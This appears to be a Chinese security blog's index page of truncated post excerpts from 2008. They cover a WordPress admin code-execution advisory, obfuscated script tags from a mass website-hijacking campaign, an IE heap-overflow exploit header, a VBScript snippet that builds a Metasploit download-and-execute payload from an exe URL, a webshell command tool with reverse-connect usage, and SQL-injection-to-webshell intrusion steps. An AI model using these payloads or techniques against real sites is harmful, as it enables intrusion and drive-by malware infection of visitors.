WordPress 2.7.0 admin remote code execution vulnerability

by Ryat[puretot]
mail: puretot at gmail dot com
team: http://www.80vul.com
date: 2008-12-18

一分析:

这个漏洞出在后台:(
阅读全文 »

Tags: ,

c.nuclear3.c%6F%6D/css/c.js挂马完美解决方案

b3b69c9c-e9b3-4abd-9af0-46faed2fa803

# 鬼仔:帮Safe3 AD下。

最近挂马闹得异常的凶,黑客商业化挂马越来越普遍,用GOOGLE搜索下:/css/c.js></Script>,就知道连hongxiu.com ,msn中国,东方财经网等都被入侵, 约有498,000项,上万个网站被挂马。

木马地址不断变形<Script Src=http://c.nuclear3.c%6F%6D/css/c.js></Script>,但总是http://c.nuclear3.com/这段在不断变化,变种有

<Script Src=http://c.nu%63lear3.com/css/c.js></Script

<Script Src=http://c.nuclear3%2E%63om/css/c.js></Script

<Script Src=http://%63.nuclear3.com/css/c.js></Script
阅读全文 »

Tags:

MS Internet Explorer XML Parsing Buffer Overflow Exploit (allinone)

<!–

IE XML Heap Corruption exploit

by krafty

greets to hdm, ddz, SK, muts, halvar, grugq, and all the ethnical hackers

sux to exploit traders – ZDI, WabiSabiLabi, and all you h0arders.

Bring back the days of technotronic and r00tshell! Freedom.

poc: launches calculator.
Tested with IE7 XP SP2, SP3, Vista.

–>
阅读全文 »

Tags: , ,

MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day 网马生成器

作者:lcx

‘code by lcx

On Error Resume Next
Exeurl = InputBox( “请输入exe的地址:”, “输入”, “http://www.haiyangtop.net/333.exe” )
url=”http://www.metasploit.com:55555/PAYLOADS?parent=GLOB%280x25bfa38%29&MODULE=win32_downloadexec&MODE=GENERATE&OPT_URL=”&URLEncoding(Exeurl)&”&MaxSize=&BadChars=0x00+&ENCODER=default&ACTION=Generate+Payload”
阅读全文 »

Tags: , , , ,

一个知道root密码可以在webshell里面执行命令的程序

作者:xi4oyu

[test@localhost tmp]$ ls -l
total 488
-rwxr-xr-x 1 root root 494816 Oct 4 07:08 ptyshell-static
[test@localhost tmp]$ md5sum ptyshell-static
3ea2a909f736660097c0248d403bbe80 ptyshell-static
[test@localhost tmp]$ ./ptyshell-static
ptyshell v0.4
orignal written by wzt ,psexec feature added by xi4oyu
usage: ./ptyshell-static <port> | <remote ip> <port>
./ptyshell-static -u username -p password -c command -pd port
阅读全文 »

Tags:

老树开新花,再看 HTTP Response Splitting 攻击

作者:

为了讲清楚这个问题,首先我们来看一个校内网的XSS。

漏洞出在 http://login.xiaonei.com

正常情况下,用户名处是已经htmlencode过了的
阅读全文 »

Tags:

入侵基于java Struts的JSP网站(续)

作者:sai52[B.H.S.T]
blog:www.sai52.com

前言:

如果新手朋友不知道什么是Struts,可以参见文章 《入侵基于java Struts的JSP网站》
(http://www.sai52.com/archives/647/)。
# 鬼仔:本站的地址 http://huaidan.org/archives/2615.html
《入侵基于java Struts的JSP网站》是好友skyfire所作,被一些大的网站转载,却都没有写上作者名字,请允许我在这里鄙视一下他们。

正文:

给朋友帮忙检测一个jsp的站点,mysql数据库。已知存在注入点,用order by 猜出了字段是15个,其他就什么有用的信息都没暴出来。union查询的时候,字段数正确但不显示正常画面。
阅读全文 »

Tags: , ,

入侵基于java Struts的JSP网站

作者:skyfire[B.H.S.T]

入侵要点:

找到注入点
暴露网站页面绝对路径
利用mysql的load_file()读取网站配置信息找到管理后台
上传webshell

了解一下 Struts和.do :

首先了解一下什么是Struts。Struts是Apache基金会Jakarta项目组的一个Open Source项目,是一种优秀的J2EE MVC架构方式,它利用taglib获得可重用代码和抽象 Java 代码,利用ActionServlet配合Struts-config.xml实现对整个系统导航。增强了开发人员对系统的整体把握,提高了系统的可维护 性和可扩充性。
阅读全文 »

Tags: , ,